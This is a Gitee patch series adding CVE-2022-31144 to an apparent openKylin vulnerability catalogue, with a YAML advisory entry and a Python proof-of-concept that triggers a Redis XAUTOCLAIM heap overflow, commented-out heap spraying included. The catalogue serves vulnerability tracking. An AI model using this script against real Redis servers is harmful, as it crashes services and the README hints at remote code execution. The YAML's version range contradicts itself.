From 54b98124254e8e6d0abe4565604f349b8bb589b7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=94=B0=E6=A0=BC=E6=A0=BC?= Date: Tue, 14 Mar 2023 01:46:33 +0000 Subject: [PATCH 1/7] update openkylin_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 田格格 --- openkylin_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 16958e20..a084eeda 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -82,6 +82,8 @@ cve: - CVE-2021-3517 - CVE-2021-3518 - CVE-2021-3537 + redis: + - CVE-2022-31144 cnvd: kve: kylin-software-properties: -- Gitee From b442837507ff9c52387050e884eb5475d4ecb92b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=94=B0=E6=A0=BC=E6=A0=BC?= Date: Tue, 14 Mar 2023 01:47:29 +0000 Subject: [PATCH 2/7] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-31144?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/redis/2022/CVE-2022-31144/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/redis/2022/CVE-2022-31144/.keep diff --git a/cve/redis/2022/CVE-2022-31144/.keep b/cve/redis/2022/CVE-2022-31144/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From f2d54fa70f7e4b049e3771daa29964b5b9286270 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=94=B0=E6=A0=BC=E6=A0=BC?= Date: Tue, 14 Mar 2023 01:47:45 +0000 Subject: [PATCH 3/7] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?redis/2022/CVE-2022-31144/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/redis/2022/CVE-2022-31144/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/redis/2022/CVE-2022-31144/.keep diff --git a/cve/redis/2022/CVE-2022-31144/.keep b/cve/redis/2022/CVE-2022-31144/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 88226d294c237c2e0459db54a02a770b1ce35017 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=94=B0=E6=A0=BC=E6=A0=BC?= Date: Tue, 14 Mar 2023 01:48:19 +0000 Subject: [PATCH 4/7] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-31144?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/redis/2022/CVE-2022-31144/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/redis/2022/CVE-2022-31144/.keep diff --git a/cve/redis/2022/CVE-2022-31144/.keep b/cve/redis/2022/CVE-2022-31144/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From d9dc4b0583d7238243f3d04aa9830d7e112e72ae Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=94=B0=E6=A0=BC=E6=A0=BC?= Date: Tue, 14 Mar 2023 01:49:03 +0000 Subject: [PATCH 5/7] CVE-2022-31144 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 田格格 --- cve/redis/2022/CVE-2022-31144/README.md | 3 +++ cve/redis/2022/CVE-2022-31144/ab.py | 34 +++++++++++++++++++++++++ 2 files changed, 37 insertions(+) create mode 100644 cve/redis/2022/CVE-2022-31144/README.md create mode 100644 cve/redis/2022/CVE-2022-31144/ab.py diff --git a/cve/redis/2022/CVE-2022-31144/README.md b/cve/redis/2022/CVE-2022-31144/README.md new file mode 100644 index 00000000..a8dddf66 --- /dev/null +++ b/cve/redis/2022/CVE-2022-31144/README.md @@ -0,0 +1,3 @@ +# CVE-2022-31144 +CVE-2022-31144 dos 4redis. +Rce not finished yet or too soon, this can be turned into rce but oh well if you smart enough diff --git a/cve/redis/2022/CVE-2022-31144/ab.py b/cve/redis/2022/CVE-2022-31144/ab.py new file mode 100644 index 00000000..c60987f0 --- /dev/null +++ b/cve/redis/2022/CVE-2022-31144/ab.py @@ -0,0 +1,34 @@ +import redis +def spray(): + for i in range(0,500): + user_connection.set("fillerA"+str(i),"A"*256) + user_connection.set("fillerB"+str(i),"B"*256) + user_connection.set("fillerC"+str(i),"C"*256) + +def create_group( skey, gname ): + try: + user_connection.xgroup_create( name=skey, groupname=gname, id="$", mkstream=True ) + except redis.ResponseError as e: + print(f"raised: {e}") + + +user_connection = redis.Redis(host='localhost', port=6379, password='', decode_responses=True) +x = user_connection.ping() +if x == True: + create_group("s:foo","g:foo") + user_connection.xadd("s:foo",{"foo":1},maxlen=1,approximate=True) + user_connection.xadd("s:foo",{"foo":2},maxlen=1,approximate=True) + user_connection.xadd("s:foo",{"foo":3},maxlen=1,approximate=True) + user_connection.xadd("s:foo",{"foo":4},maxlen=1,approximate=True) + user_connection.xadd("s:foo",{"foo":5},maxlen=1,approximate=True) + print(user_connection.xreadgroup("g:foo","c:1",count=1,streams={"s:foo":">"})) + print(user_connection.xreadgroup("g:foo","c:1",count=1,streams={"s:foo":">"})) + print(user_connection.xreadgroup("g:foo","c:1",count=1,streams={"s:foo":">"})) + print(user_connection.xreadgroup("g:foo","c:1",count=1,streams={"s:foo":">"})) + print(user_connection.xreadgroup("g:foo","c:1",count=1,streams={"s:foo":">"})) + user_connection.xtrim("s:foo",maxlen=1) + print(user_connection.xreadgroup("g:foo","c:1",count=10,streams={"s:foo":"0"})) + user_connection.xautoclaim("s:foo","g:foo","c:1",10,0,count=100000000000000000) + #spray() + #for i in range(200,500,i+2): + # user_connection.delete("fillerA"+str(i)) -- Gitee From 6a375cfe372ef860910fa5fd0bcd18e1f4c0d9f9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=94=B0=E6=A0=BC=E6=A0=BC?= Date: Tue, 14 Mar 2023 01:49:10 +0000 Subject: [PATCH 6/7] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?redis/2022/CVE-2022-31144/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/redis/2022/CVE-2022-31144/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/redis/2022/CVE-2022-31144/.keep diff --git a/cve/redis/2022/CVE-2022-31144/.keep b/cve/redis/2022/CVE-2022-31144/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 904588e34a79c82be53be4045c14e301d1604421 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=94=B0=E6=A0=BC=E6=A0=BC?= Date: Tue, 14 Mar 2023 02:01:20 +0000 Subject: [PATCH 7/7] add cve/redis/2022/yaml/CVE-2022-31144.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 田格格 --- cve/redis/2022/yaml/CVE-2022-31144.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cve/redis/2022/yaml/CVE-2022-31144.yaml diff --git a/cve/redis/2022/yaml/CVE-2022-31144.yaml b/cve/redis/2022/yaml/CVE-2022-31144.yaml new file mode 100644 index 00000000..7b5dcafb --- /dev/null +++ b/cve/redis/2022/yaml/CVE-2022-31144.yaml @@ -0,0 +1,24 @@ +id: CVE-2022-31144 +source: + https://github.com/SpiralBL0CK/CVE-2022-31144 +info: + name: Redis是著名的开源Key-Value数据库, 其具备在沙箱中执行Lua脚本的能力. + severity: High + description: | + Redis 是一个内存中数据库, 它保留在磁盘上. 在特定状态下对流密钥的特制“XAUTOCLAIM”命令可能会导致堆溢出, 并可能导致远程代码执行. 此问题会影响 7.7.0 之前的 4.x 分支上的版本. 该修补程序在版本 7.0.4 中发布. + scope-of-influence: + 7.0 <= redis < 7.0.4 + reference: + - https://github.com/redis/redis/releases/tag/7.0.4 + - https://nvd.nist.gov/vuln/detail/CVE-2022-31144 + - https://github.com/redis/redis/security/advisories/GHSA-96f7-42fg-2jrh + - https://security.gentoo.org/glsa/202209-17 + - https://security.netapp.com/advisory/ntap-20220909-0002/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-31144 + cwe-id: CWE-787, CWE-122 + cnvd-id: None + kve-id: None + tags: 堆溢出, 远程代码执行 \ No newline at end of file -- Gitee